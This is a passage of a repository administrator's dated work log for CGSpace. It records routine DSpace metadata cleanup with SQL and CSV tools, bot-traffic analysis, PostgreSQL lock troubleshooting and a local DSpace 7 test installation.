  • Then I updated the controlled vocabulary for affiliations by exporting the top 1,000 used terms:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2021-09-23-affiliations.csv WITH CSV HEADER;
+$ csvcut -c 1 /tmp/2021-09-23-affiliations.csv | sed 1d > /tmp/affiliations.txt
+
    +
  • Peter also sent me 310 corrections and 234 deletions for donors so I applied those and updated the controlled vocabularies too
  • +
  • Move some One CGIAR-related collections around the CGSpace hierarchy for Peter Ballantyne
  • +
  • Mohammed Salem asked me for an ID to UUID mapping for CGSpace collections, so I generated one similar to the ID one I sent him in 2020-11:
  • +
+
localhost/dspace63= > \COPY (SELECT collection_id,uuid FROM collection WHERE collection_id IS NOT NULL) TO /tmp/2021-09-23-collection-id2uuid.csv WITH CSV HEADER;
+COPY 1139
+

2021-09-24

+
    +
  • Peter and Abenet agreed that we should consider converting more of our UPPER CASE metadata values to Title Case +
      +
    • It seems that these fields are all still using UPPER CASE: +
        +
      • cg.subject.alliancebiovciat
      • +
      • cg.species.breed
      • +
      • cg.subject.bioversity
      • +
      • cg.subject.ccafs
      • +
      • cg.subject.ciat
      • +
      • cg.subject.cip
      • +
      • cg.identifier.iitatheme
      • +
      • cg.subject.iita
      • +
      • cg.subject.ilri
      • +
      • cg.subject.pabra
      • +
      • cg.river.basin
      • +
      • cg.coverage.subregion (done)
      • +
      • dcterms.audience (done)
      • +
      • cg.subject.wle
      • +
      +
    • +
    • We can do some of these without even asking anyone, for example cg.coverage.subregion, cg.river.basin, and dcterms.audience
    • +
    +
  • +
  • First, I will look at cg.coverage.subregion +
      +
    • These should ideally come from ISO 3166-2 subdivisions
    • +
    • I will title case them and then create a controlled vocabulary from those that are matching (and worry about cleaning the rest up later)
    • +
    +
  • +
+
localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=231;
+UPDATE 2903
+localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.coverage.subregion" FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 231) to /tmp/2021-09-24-subregions.txt;
+COPY 1200
+
    +
  • Then I process the list for matches with my subdivision-lookup.py script, and extract only the values that matched:
  • +
+
$ ./ilri/subdivision-lookup.py -i /tmp/2021-09-24-subregions.txt -o /tmp/subregions.csv
+$ csvgrep -c matched -m 'true' /tmp/subregions.csv | csvcut -c 1 | sed 1d > /tmp/subregions-matched.txt
+$ wc -l /tmp/subregions-matched.txt 
+81 /tmp/subregions-matched.txt
+
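  • For what it's worth, the check that subdivision-lookup.py does can be approximated with pycountry's bundled ISO 3166-2 data (whether the real script uses pycountry is an assumption):

# Sketch: flag subregion strings that match ISO 3166-2 subdivision names
import csv
import pycountry

subdivision_names = {subdivision.name.lower() for subdivision in pycountry.subdivisions}

with open("/tmp/2021-09-24-subregions.txt") as infile, open("/tmp/subregions.csv", "w") as outfile:
    writer = csv.writer(outfile)
    writer.writerow(["cg.coverage.subregion", "matched"])
    for line in infile:
        value = line.strip()
        if value:
            writer.writerow([value, str(value.lower() in subdivision_names).lower()])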
    +
  • Then I updated the controlled vocabulary in the submission forms
  • +
  • I did the same for dcterms.audience, taking special care to a few all-caps values:
  • +
+
localhost/dspace63= > UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value != 'NGOS' AND text_value != 'CGIAR';
+localhost/dspace63= > UPDATE metadatavalue SET text_value='NGOs' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'NGOS';
+
    +
  • Update submission form comment for DOIs because it was still recommending people use the “dx.doi.org” format even though I batch updated all DOIs to the “doi.org” format a few times in the last year +
      +
    • Then I updated all existing metadata to the new format again:
    • +
    +
  • +
+
dspace=# UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
+UPDATE 49
+

2021-09-26

+
    +
  • Mohammed Salem told me last week that MELSpace and WorldFish have been upgraded to DSpace 6 so I updated the repository setup in AReS to use the UUID field instead of IDs +
      +
    • This could explain how I had problems harvesting last week, when I only had 90,000 items…
    • +
    +
  • +
  • I started a fresh harvest on AReS +
      +
    • I realized that the sitemap on MELSpace is missing so AReS skips it, which means we cannot harvest right now… ouch
    • +
    • I sent a message to Salem and he fixed it quickly
    • +
    • I added WorldFish’s DSpace Statistics API instance to AReS before starting the plugins and now our numbers are much higher, nice!
    • +
    +
  • +
+

2021-09-27

+
    +
  • Add CGIAR Action Area (cg.subject.actionArea) to CGSpace as Peter had asked me a few days ago
  • +
+

2021-09-28

+
    +
  • Francesca from the Alliance asked for help moving a bunch of reports from one collection to another on CGSpace +
      +
    • She is having problems with the “move” dialog taking minutes for each item
    • +
    • I exported the collection and sent her a copy with just the few fields she would need in order to mark the ones that need to move, then I can do the rest:
    • +
    +
  • +
+
$ csvcut -c 'id,collection,dc.title[en_US]' ~/Downloads/10568-106990.csv > /tmp/2021-09-28-alliance-reports.csv
+
    +
  • She sent it back fairly quickly with a new column marked “Move” so I extracted those items that matched and set them to the new owning collection:
  • +
+
$ csvgrep -c Move -m 'Yes' ~/Downloads/2021_28_09_alliance_reports_csv.csv | csvcut -c 1,2 | sed 's_10568/106990_10568/111506_' > /tmp/alliance-move.csv
+
    +
  • Maria from the Alliance emailed us to say that approving submissions was slow on CGSpace +
      +
    • I looked at the PostgreSQL activity and it seems low:
    • +
    +
  • +
+
postgres@linode18:~$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
+59
+
    +
  • Locks look high though:
  • +
+
postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | sort | uniq -c | wc -l
+1154
+
    +
  • Indeed it seems something started causing locks to increase yesterday:
  • +
+

PostgreSQL locks week

+
    +
  • And query length increasing since yesterday:
  • +
+

PostgreSQL query length week

+
    +
  • The number of DSpace sessions is normal, hovering around 1,000…
  • +
  • Looking closer at the PostgreSQL activity log, I see the locks are all held by the dspaceCli user… which seem weird:
  • +
+
postgres@linode18:~$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceCli';" | wc -l
+1096
+
    +
  • Now I’m wondering why there are no connections from dspaceApi or dspaceWeb. Could it be that our Tomcat JDBC pooling via JNDI isn’t working? +
      +
    • I see the same thing on DSpace Test hmmmm
    • +
    • The configuration in server.xml is correct, but it could be that when I changed to using the updated JDBC driver from pom.xml instead of dropping it in the Tomcat lib directory that something broke…
    • +
    • I downloaded the latest JDBC jar and put it in Tomcat’s lib directory on DSpace Test and after restarting Tomcat I can see connections from dspaceWeb and dspaceApi again
    • +
    • I will do the same on CGSpace and then revert the JDBC change in Ansible and DSpace pom.xml
    • +
    +
  • +
+

2021-09-29

+
    +
  • Export a list of ILRI subjects from CGSpace to validate against AGROVOC for Peter and Abenet:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 203) to /tmp/2021-09-29-ilri-subject.txt;
+COPY 149
+
    +
  • Then validate and format the matches:
  • +
+
$ ./ilri/agrovoc-lookup.py -i /tmp/2021-09-29-ilri-subject.txt -o /tmp/2021-09-29-ilri-subjects.csv -d
+$ csvcut -c subject,'match type' /tmp/2021-09-29-ilri-subjects.csv | sed -e 's/match type/matched/' -e 's/\(alt\|pref\)Label/yes/' > /tmp/2021-09-29-ilri-subjects2.csv
+
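  • agrovoc-lookup.py is essentially a loop over the AGROVOC Skosmos search API; a stripped-down sketch (the endpoint URL is from memory and should be checked against the current AGROVOC host):

# Sketch: check whether a subject term exists in AGROVOC via the Skosmos REST API
import requests

def in_agrovoc(term: str, lang: str = "en") -> bool:
    # Endpoint is an assumption; adjust to the current AGROVOC Skosmos installation
    url = "https://agrovoc.fao.org/browse/rest/v1/agrovoc/search"
    response = requests.get(url, params={"query": term, "lang": lang}, timeout=30)
    response.raise_for_status()
    return len(response.json().get("results", [])) > 0

for term in ("LIVESTOCK", "FORAGES", "NOT A REAL SUBJECT"):
    print(term, in_agrovoc(term))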
    +
  • I talked to Salem about depositing from MEL to CGSpace +
      +
    • He mentioned that the one issue is that when you deposit to a workflow you don’t get a Handle or any kind of identifier back!
    • +
    • We might have to come to some kind of agreement that they deposit items without going into the workflow but that we have some kind of edit role in MEL
    • +
    • He also said that they are looking into using the Research Organization Registry (RoR) in MEL, at least adding the ror_id and storing it
    • +
    • I need to propose this to Peter again and perhaps start aligning our affiliations closer (I could even do something like the country codes with a process that scans every day)
    • +
    +
  • +
  • Talk to Moayad about OpenRXV +
      +
    • We decided that we’d keep harvesting all the Handles from the Altmetric prefix API, but then have a plugin to retrieve DOI scores that we can run manually
    • +
    +
  • +
+

2021-09-30

+
    +
  • Look over 292 non-IWMI publications from Udana for inclusion into the Virtual library on water management collection on CGSpace +
      +
    • I did some minor cleanup to remove blank columns and run it through the csv-metadata-quality tool
    • +
    • I told him to add licenses and journal volume/issue and asked Abenet for input as well
    • +
    +
  • +

October, 2021


2021-10-01

+
    +
  • Export all affiliations on CGSpace and run them against the latest RoR data dump:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
+$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
+$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affiliations-matching.csv
+$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
+1879
+$ wc -l /tmp/2021-10-01-affiliations.txt 
+7100 /tmp/2021-10-01-affiliations.txt
+
    +
  • So we have 1879/7100 (26.46%) matching already
  • +
+
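  • The matching that ror-lookup.py does is nothing fancy; a sketch, assuming the v1 ROR dump schema with name, aliases, acronyms, and labels on each record:

# Sketch: check affiliation strings against the names in a ROR data dump
import csv
import json

with open("2021-09-23-ror-data.json") as f:
    ror_names = set()
    for org in json.load(f):
        ror_names.add(org["name"].lower())
        ror_names.update(alias.lower() for alias in org.get("aliases", []))
        ror_names.update(acronym.lower() for acronym in org.get("acronyms", []))
        ror_names.update(label["label"].lower() for label in org.get("labels", []))

with open("/tmp/2021-10-01-affiliations.txt") as infile, open("/tmp/2021-10-01-affiliations-matching.csv", "w") as outfile:
    writer = csv.writer(outfile)
    writer.writerow(["cg.contributor.affiliation", "matched"])
    for line in infile:
        affiliation = line.strip()
        if affiliation:
            writer.writerow([affiliation, str(affiliation.lower() in ror_names).lower()])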

2021-10-03

+
    +
  • Dominique from IWMI asked me for information about how CGSpace partners are using CGSpace APIs to feed their websites
  • +
  • Start a fresh indexing on AReS
  • +
  • Udana sent me his file of 292 non-IWMI publications for the Virtual library on water management +
      +
    • He added licenses
    • +
    • I want to clean up the dcterms.extent field though because it has volume, issue, and pages there
    • +
    • I cloned the column several times and extracted values based on their positions, for example: +
        +
      • Volume: value.partition(":")[0]
      • +
      • Issue: value.partition("(")[2].partition(")")[0]
      • +
      • Page: "p. " + value.replace(".", "")
      • +
      +
    • +
    +
  • +
+

2021-10-04

+
    +
  • Start looking at the last month of Solr statistics on CGSpace +
      +
    • I see a number of IPs with “normal” user agents who clearly behave like bots +
        +
      • 198.15.130.18: 21,000 requests to /discover with a normal-looking user agent, from ASN 11282 (SERVERYOU, US)
      • +
      • 93.158.90.107: 8,500 requests to handle and browse links with a Firefox 84.0 user agent, from ASN 12552 (IPO-EU, SE)
      • +
      • 193.235.141.162: 4,800 requests to handle, browse, and discovery links with a Firefox 84.0 user agent, from ASN 51747 (INTERNETBOLAGET, SE)
      • +
      • 3.225.28.105: 2,900 requests to REST API for the CIAT Story Maps collection with a normal user agent, from ASN 14618 (AMAZON-AES, US)
      • +
      • 34.228.236.6: 2,800 requests to discovery for the CGIAR System community with user agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1), from ASN 14618 (AMAZON-AES, US)
      • +
      • 18.212.137.2: 2,800 requests to discovery for the CGIAR System community with user agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1), from ASN 14618 (AMAZON-AES, US)
      • +
      • 3.81.123.72: 2,800 requests to discovery and handles for the CGIAR System community with user agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1), from ASN 14618 (AMAZON-AES, US)
      • +
      • 3.227.16.188: 2,800 requests to discovery and handles for the CGIAR System community with user agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1), from ASN 14618 (AMAZON-AES, US)
      • +
      +
    • +
    • Looking closer into the requests with this Mozilla/4.0 user agent, I see 500+ IPs using it:
    • +
    +
  • +
+
# zcat --force /var/log/nginx/*.log* | grep 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' | awk '{print $1}' | sort | uniq > /tmp/mozilla-4.0-ips.txt
+# wc -l /tmp/mozilla-4.0-ips.txt 
+543 /tmp/mozilla-4.0-ips.txt
+
    +
  • Then I resolved the IPs and extracted the ones belonging to Amazon:
  • +
+
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/mozilla-4.0-ips.txt -k "$ABUSEIPDB_API_KEY" -o /tmp/mozilla-4.0-ips.csv
+$ csvgrep -c asn -m 14618 /tmp/mozilla-4.0-ips.csv | csvcut -c ip | sed 1d | tee /tmp/amazon-ips.txt | wc -l
+
    +
  • I am thinking I will purge them all, as I have several indicators that they are bots: mysterious user agent, IP owned by Amazon
  • +
  • Even more interesting, these requests are weighted VERY heavily on the CGIAR System community:
  • +
+
   1592 GET /handle/10947/2526
+   1592 GET /handle/10947/2527
+   1592 GET /handle/10947/34
+   1593 GET /handle/10947/6
+   1594 GET /handle/10947/1
+   1598 GET /handle/10947/2515
+   1598 GET /handle/10947/2516
+   1599 GET /handle/10568/101335
+   1599 GET /handle/10568/91688
+   1599 GET /handle/10947/2517
+   1599 GET /handle/10947/2518
+   1599 GET /handle/10947/2519
+   1599 GET /handle/10947/2708
+   1599 GET /handle/10947/2871
+   1600 GET /handle/10568/89342
+   1600 GET /handle/10947/4467
+   1607 GET /handle/10568/103816
+ 290382 GET /handle/10568/83389
+
    +
  • Before I purge all those I will ask Samuel Stacey from the System Office to hopefully get an insight…
  • +
  • Meeting with Michael Victor, Peter, Jane, and Abenet about the future of repositories in the One CGIAR
  • +
  • Meeting with Michelle from Altmetric about their new CSV upload system +
      +
    • I sent her some examples of Handles that have DOIs, but no linked score (yet) to see if an association will be created when she uploads them
    • +
    +
  • +
+
doi,handle
+10.1016/j.agsy.2021.103263,10568/115288
+10.3389/fgene.2021.723360,10568/115287
+10.3389/fpls.2021.720670,10568/115285
+
    +
  • Extract the AGROVOC subjects from IWMI’s 292 publications to validate them against AGROVOC:
  • +
+
$ csvcut -c 'dcterms.subject[en_US]' ~/Downloads/2021-10-03-non-IWMI-publications.csv | sed -e 1d -e 's/||/\n/g' -e 's/"//g' | sort -u > /tmp/agrovoc.txt
+$ ./ilri/agrovoc-lookup.py -i /tmp/agrovoc-sorted.txt -o /tmp/agrovoc-matches.csv
+$ csvgrep -c 'number of matches' -m '0' /tmp/agrovoc-matches.csv | csvcut -c 1 > /tmp/invalid-agrovoc.csv
+

2021-10-05

+
    +
  • Sam put me in touch with Dodi from the System Office web team and he confirmed that the Amazon requests are not theirs +
      +
    • I added Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) to the list of bad bots in nginx
    • +
    • I purged all the Amazon IPs using this user agent, as well as the few other IPs I identified yesterday
    • +
    +
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/robot-ips.txt -p
+...
+
+Total number of bot hits purged: 465119
+

2021-10-06

+ +
localhost/dspace63= > CREATE EXTENSION pg_trgm;
+localhost/dspace63= > SELECT metadata_value_id, text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines') > 0.5;
+ metadata_value_id │                                         text_value                                         │           dspace_object_id
+───────────────────┼────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
+           3652624 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ b7f0bf12-b183-4b2f-bbd2-7a5697b0c467
+           3677663 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ fb62f551-f4a5-4407-8cdc-6bff6dac399e
+(2 rows)
+
    +
  • I was able to find an exact duplicate for an IITA item by searching for its title (I already knew that these existed)
  • +
  • I started working on a basic Python script to do this and managed to find an actual duplicate in the recent IWMI items +
      +
    • I think I will check for similar titles, and if I find them I will print out the handles for verification
    • +
    • I could also proceed to check other metadata like type because those shouldn’t vary too much
    • +
    +
  • +
  • I ran my new check-duplicates.py script on the 292 non-IWMI publications from Udana and found twelve potential duplicates +
      +
    • Upon checking them manually, I found that 7/12 were indeed already present on CGSpace!
    • +
    • This is with the similarity threshold at 0.5. I wonder if tweaking that higher will make the script run faster and eliminate some false positives
    • +
    • I re-ran it with higher thresholds, which eliminated all false positives, but it still took 24 minutes to run for 292 items! +
        +
      • 0.6: ./ilri/check-duplicates.py -i ~/Downloads/2021-10-03-non-IWMI-publications.cs 0.09s user 0.03s system 0% cpu 24:40.42 total
      • +
      • 0.7: ./ilri/check-duplicates.py -i ~/Downloads/2021-10-03-non-IWMI-publications.cs 0.12s user 0.03s system 0% cpu 24:29.15 total
      • +
      • 0.8: ./ilri/check-duplicates.py -i ~/Downloads/2021-10-03-non-IWMI-publications.cs 0.09s user 0.03s system 0% cpu 25:44.13 total
      • +
      +
    • +
    +
  • +
  • Some minor updates to csv-metadata-quality +
      +
    • Fix two issues with regular expressions in the duplicate items and experimental language checks
    • +
    • Add a check for items that have a DOI listed in their citation, but are missing a standalone DOI field
    • +
    +
  • +
  • Then I ran this new version of csv-metadata-quality on an export of IWMI’s community, minus some fields I don’t want to check:
  • +
+
$ csvcut -C 'dc.date.accessioned,dc.date.accessioned[],dc.date.accessioned[en_US],dc.date.available,dc.date.available[],dc.date.available[en_US],dcterms.issued[en_US],dcterms.issued[],dcterms.issued,dc.description.provenance[en],dc.description.provenance[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dcterms.abstract[en_US],dcterms.bibliographicCitation[en_US],collection' ~/Downloads/iwmi.csv > /tmp/iwmi-to-check.csv
+$ csv-metadata-quality -i /tmp/iwmi-to-check.csv -o /tmp/iwmi.csv | tee /tmp/out.log
+$ xsv split -s 2000 /tmp /tmp/iwmi.csv
+
    +
  • I noticed each CSV only had 10 or 20 corrections, mostly that none of the duplicate metadata values were removed in the CSVs… +
      +
    • I cut a subset of the fields from the main CSV and tried again, but DSpace said “no changes detected”
    • +
    • The duplicates are definitely removed from the CSV, but DSpace doesn’t detect them
    • +
    • I realized this is an issue I’ve had before, but forgot because I usually use csv-metadata-quality for new items, not ones already inside DSpace!
    • +
    • I found a comment on a thread on the dspace-tech mailing list from helix84 in 2015 (“No changes were detected” when importing metadata via XMLUI) where he says:
    • +
    +
  • +
+
+

It’s very likely that multiple values in a single field are being compared as an unordered set rather than an ordered list. Try doing it in two imports. In first import, remove all authors. In second import, add them in the new order.

+
+
    +
  • Shit, so that’s worth looking into…
  • +
+

2021-10-07

+
    +
  • I decided to upload the cleaned IWMI community by moving the cleaned metadata field from dcterms.subject[en_US] to dcterms.subject[en_Fu] temporarily, uploading them, then moving them back, and uploading again +
      +
    • I started by copying just a handful of fields from the iwmi.csv community export:
    • +
    +
  • +
+
$ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.iwmilibrary[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],cg.river.basin[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' ~/Downloads/iwmi.csv > /tmp/iwmi-duplicate-metadata.csv
+# Copy and blank columns in OpenRefine
+$ csv-metadata-quality -i ~/Downloads/2021-10-07-IWMI-duplicate-metadata-csv.csv -o /tmp/iwmi-duplicates-cleaned.csv | tee /tmp/out.log
+$ xsv split -s 2000 /tmp /tmp/iwmi-duplicates-cleaned.csv
+
    +
  • It takes a few hours per 2,000 items because DSpace processes them so slowly… sigh…
  • +
+

2021-10-08

+
    +
  • I decided to update these records in PostgreSQL instead of via several CSV batches, as there were several others to normalize too:
  • +
+
cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+ text_lang |  count  
+-----------+---------
+ en_US     | 2603711
+ en_Fu     |  115568
+ en        |    8818
+           |    5286
+ fr        |       2
+ vn        |       2
+           |       0
+(7 rows)
+cgspace=# BEGIN;
+cgspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en_Fu', 'en', '');
+UPDATE 129673
+cgspace=# COMMIT;
+
    +
  • So all this effort to remove ~400 duplicate metadata values in the IWMI community hmmm:
  • +
+
$ grep -c 'Removing duplicate value' /tmp/out.log
+391
+
    +
  • I tried to export ILRI’s community, but ran into the export bug (DS-4211) +
      +
    • After applying the patch on my local instance I was able to export, but found many duplicate items in the CSV (as I also noticed in 2021-02):
    • +
    +
  • +
+
$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sed '1d' | wc -l 
+32070
+$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed '1d' | wc -l
+19315
+
    +
  • It seems there are only about 200 duplicate values in this subset of fields in ILRI’s community:
  • +
+
$ grep -c 'Removing duplicate value' /tmp/out.log
+220
+
    +
  • I found a cool way to select only the items with corrections +
      +
    • First, extract a handful of fields from the CSV with csvcut
    • +
    • Second, clean the CSV with csv-metadata-quality
    • +
    • Third, rename the columns to something obvious in the cleaned CSV
    • +
    • Fourth, use csvjoin to merge the cleaned file with the original
    • +
    +
  • +
+
$ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' /tmp/ilri.csv | csvsort | uniq > /tmp/ilri-deduplicated-items.csv
+$ csv-metadata-quality -i /tmp/ilri-deduplicated-items.csv -o /tmp/ilri-deduplicated-items-cleaned.csv | tee /tmp/out.log
+$ sed -i -e '1s/en_US/en_Fu/g' /tmp/ilri-deduplicated-items-cleaned.csv
+$ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cleaned.csv > /tmp/ilri-deduplicated-items-cleaned-joined.csv
+
    +
  • Then I imported the file into OpenRefine and used a custom text facet with a GREL like this to identify the rows with changes:
  • +
+
if(cells['dcterms.subject[en_US]'].value == cells['dcterms.subject[en_Fu]'].value,"same","different")
+
    +
  • For these rows I starred them and then blanked out the original field so DSpace would see it as a removal, and add the new column +
      +
    • After these are uploaded I will normalize the text_lang fields in PostgreSQL again
    • +
    +
  • +
  • I did the same for CIAT but there were over 7,000 duplicate metadata values! Hard to believe:
  • +
+
$ grep -c 'Removing duplicate value' /tmp/out.log
+7720
+
    +
  • I applied these to the CIAT community, so in total that’s over 8,000 duplicate metadata values removed in a handful of fields…
  • +
+

2021-10-09

+
    +
  • I did similar metadata cleanups for CCAFS and IITA too, but there were only a few hundred duplicates there
  • +
  • Also of note, there are some other fixes too, for example in IITA’s community:
  • +
+
$ grep -c -E '(Fixing|Removing) (duplicate|excessive|invalid)' /tmp/out.log
+249
+
    +
  • I ran a full Discovery re-indexing on CGSpace
  • +
  • Then I exported all of CGSpace and extracted the ISSNs and ISBNs:
  • +
+
$ csvcut -c 'id,cg.issn[en_US],dc.identifier.issn[en_US],cg.isbn[en_US],dc.identifier.isbn[en_US]' /tmp/cgspace.csv > /tmp/cgspace-issn-isbn.csv
+
    +
  • I did cleanups on about seventy items with invalid and mixed ISSNs/ISBNs
  • +
+

2021-10-10

+
    +
  • Start testing DSpace 7.1-SNAPSHOT to see if it has the duplicate item bug on metadata-export (DS-4211)
  • +
  • First create a new PostgreSQL 13 container:
  • +
+
$ podman run --name dspacedb13 -v dspacedb13_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5433:5432 -d postgres:13-alpine
+$ createuser -h localhost -p 5433 -U postgres --pwprompt dspacetest
+$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
+$ psql -h localhost -p 5433 -U postgres dspace7 -c 'CREATE EXTENSION pgcrypto;'
+
    +
  • Then edit setting in dspace/config/local.cfg and build the backend server with Java 11:
  • +
+
$ mvn package
+$ cd dspace/target/dspace-installer
+$ ant fresh_install
+# fix database not being fully ready, causing Tomcat to fail to start the server application
+$ ~/dspace7/bin/dspace database migrate
+
    +
  • Copy Solr configs and start Solr:
  • +
+
$ cp -Rv ~/dspace7/solr/* ~/src/solr-8.8.2/server/solr/configsets
+$ ~/src/solr-8.8.2/bin/solr start
+
    +
  • Start my local Tomcat 9 instance:
  • +
+
$ systemctl --user start tomcat9@dspace7
+
    +
  • This works, so now I will drop the default database and import a dump from CGSpace
  • +
+
$ systemctl --user stop tomcat9@dspace7                                
+$ dropdb -h localhost -p 5433 -U postgres dspace7
+$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
+$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest superuser;'
+$ pg_restore -h localhost -p 5433 -U postgres -d dspace7 -O --role=dspacetest -h localhost dspace-2021-10-09.backup
+$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest nosuperuser;'
+
    +
  • Delete Atmire migrations and some others that were “unresolved”:
  • +
+
$ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';"
+$ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');"
+
    +
  • Now DSpace 7 starts with my CGSpace data… nice +
      +
    • The Discovery indexing still takes seven hours… fuck
    • +
    +
  • +
  • I tested the metadata-export on DSpace 7.1-SNAPSHOT and it still has the duplicate items issue introduced by DS-4211 + +
  • +
  • Start a full reindex on AReS
  • +
+

2021-10-11

+
    +
  • Start a full Discovery reindex on my local DSpace 6.3 instance:
  • +
+
$ /usr/bin/time -f %M:%e chrt -b 0 ~/dspace63/bin/dspace index-discovery -b
+Loading @mire database changes for module MQM
+Changes have been processed
+836140:6543.6
+
    +
  • So that’s 1.8 hours versus 7 on DSpace 7, with the same database!
  • +
  • Several users wrote to me that CGSpace was slow recently +
      +
    • Looking at the PostgreSQL database I see connections look normal, but locks for dspaceWeb are high:
    • +
    +
  • +
+
$ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
+53
+$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
+1697
+$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceWeb'" | wc -l
+1681
+
    +
  • Looking at Munin, I see there are indeed a higher number of locks starting on the morning of 2021-10-07:
  • +
+

PostgreSQL locks week

+
    +
  • The only thing I did on 2021-10-07 was import a few thousand metadata corrections…
  • +
  • I restarted PostgreSQL (instead of restarting Tomcat), so let’s see if that helps
  • +
  • I filed a bug for the DSpace 6/7 duplicate values metadata import issue
  • +
  • I tested the two patches for removing abandoned submissions from the workflow but unfortunately it seems that they are for the configurable aka XML workflow, and we are using the basic workflow
  • +
  • I discussed PostgreSQL issues with some people on the DSpace Slack +
      +
    • Looking at postgresqltuner.pl and https://pgtune.leopard.in.ua I realized that there were some settings that I hadn’t changed in a few years that I probably need to re-evaluate
    • +
    • For example, random_page_cost is recommended to be 1.1 in the PostgreSQL 10 docs (default is 4.0, but we use 1 since 2017 when it came up in Hacker News)
    • +
    • Also, effective_io_concurrency is recommended to be “hundreds” if you are using an SSD (default is 1)
    • +
    +
  • +
  • I also enabled the pg_stat_statements extension to try to understand what queries are being run the most often, and how long they take
  • +
+

2021-10-12

+
    +
  • I looked again at the duplicate items query I was doing with trigrams recently and found a few new things +
      +
    • Looking at the EXPLAIN ANALYZE plan for the query I noticed it wasn’t using any indexes
    • +
    • I read on StackExchange that, if we want to make use of indexes, we need to use the similarity operator (%), not the function similarity() because “index support is bound to operators in Postgres, not to functions”
    • +
    • A note about the query plan output is that we need to read it from the bottom up!
    • +
    • So with the similarity operator we need to set the threshold like this now:
    • +
    +
  • +
+
localhost/dspace= > SET pg_trgm.similarity_threshold = 0.5;
+
    +
  • Next I experimented with using GIN or GiST indexes on metadatavalue, but they were slower than the existing DSpace indexes +
      +
    • I tested a few variations of the query I had been using and found it’s much faster if I use the similarity operator and keep the condition that object IDs are in the item table…
    • +
